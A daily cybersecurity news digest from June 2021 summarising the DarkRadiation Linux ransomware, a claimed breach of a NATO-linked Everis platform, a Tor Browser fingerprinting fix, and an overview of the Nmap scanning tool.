Cyber Security News — Past 24 hours | 24.06.2021
Wormable DarkRadiation Ransomware Targets Linux and Docker Instances
Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called “DarkRadiation” that’s implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control communications.
DarkRadiation’s infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files as well as Telegram API to communicate with the C2 server via hardcoded API keys.
Said to be under active development, the ransomware leverages obfuscation tactics to scramble the Bash script using an open-source tool called “node-bash-obfuscate” to split the code into multiple chunks, followed by assigning a variable name to each segment and replacing the original script with variable references.
Interestingly, SentinelOne’s analysis reveals different variations wherein the password for the user “ferrum” is downloaded from the attacker’s C2 server in few versions, while in others, it is hardcoded with strings such as “$MeGaPass123#,” implying that the malware is undergoing rapid changes prior to actual deployment.
“It must be noted that the ransomware appends radioactive symbols as a file extension for an encrypted file,” Trend Micro threat researcher Aliakbar Zahravi said.
NATO’s Cloud Platform Hacked
The SOA & IdM platform is utilized by NATO and is classified as secret. It was used to conduct various critical functions inside the Polaris programme. The North Atlantic Treaty Organization , commonly known as the North Atlantic Alliance, is an intergovernmental military alliance made up of 30 European and North American countries.
Polaris was developed as part of NATO’s IT modernization effort and uses the SOA & IdM platform to provide centralized security, integration, and hosting information management. The military alliance classified the platform as a secret because it performs multiple key roles.
According to the hackers, they used a backdoor to make copies of the data on this platform and attempted to blackmail Everis. They went even further, making jokes about handing over the stolen material to Russian intelligence.
Furthermore, they concentrated solely on Everis’ corporate data in Latin America, despite NATO’s announcement that it was ready to respond to a cyber-attack. One of the secure NATO systems was among Everis’ subsidiaries, much to their astonishment.
After analyzing the company and discovering documents connected to drones and military defense systems, the hackers continued stealing more data from Everis networks.
Tor Browser 10.0.18 Released — Fixed The Flaw That Let Websites Tracking Users
Tor is one of the biggest open-source software, its networks have virtual tunnels that generally enable people and different groups to enhance their privacy and security on the Internet.
Recently Tor has released its Tor Browser 10.0.18, and the main motive of this release is to fix all the countless bugs, which also include a vulnerability that enables different websites to keep track of their users by fingerprinting the installed application.
But, this network consists of nearly seven thousand relays, that help in concealing a user’s location as well as usage from people who are conducting network surveillance or traffic examination.
Scheme flooding is a vulnerability, that uses different custom URL schemes as an attack vector. Once the experts identified the application successfully, then they use all the data and information of the installed app on the user’s computer.
And the main motive of doing this is that they want to assign a permanent unique identifier in the user’s computer so that they can use the system even if the users switch browsers just by using incognito mode or a VPN.
Nmap — A Detailed of Explanation Penetration Testing Tool To Perform Information Gathering
Nmap is an open source network monitoring and port scanning tool to find the hosts and services in the computer by sending the packets to the target host for network discovery and security auditing.
Numerous frameworks and system admins additionally think that its helpful for assignments, for example, network inventory, overseeing administration overhaul timetables, and observing host or administration uptime.
Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
It was designed to rapidly scan large networks, but works fine against single hosts. it runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.
In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results in the viewer , a flexible data transfer, redirection, and debugging tool , a utility for comparing scan results , and a packet generation and response analysis tool .
Stay Focused. Stay Vigilant.
Cyber Threat Incident Management Team — Cyber Security Community @ SLIIT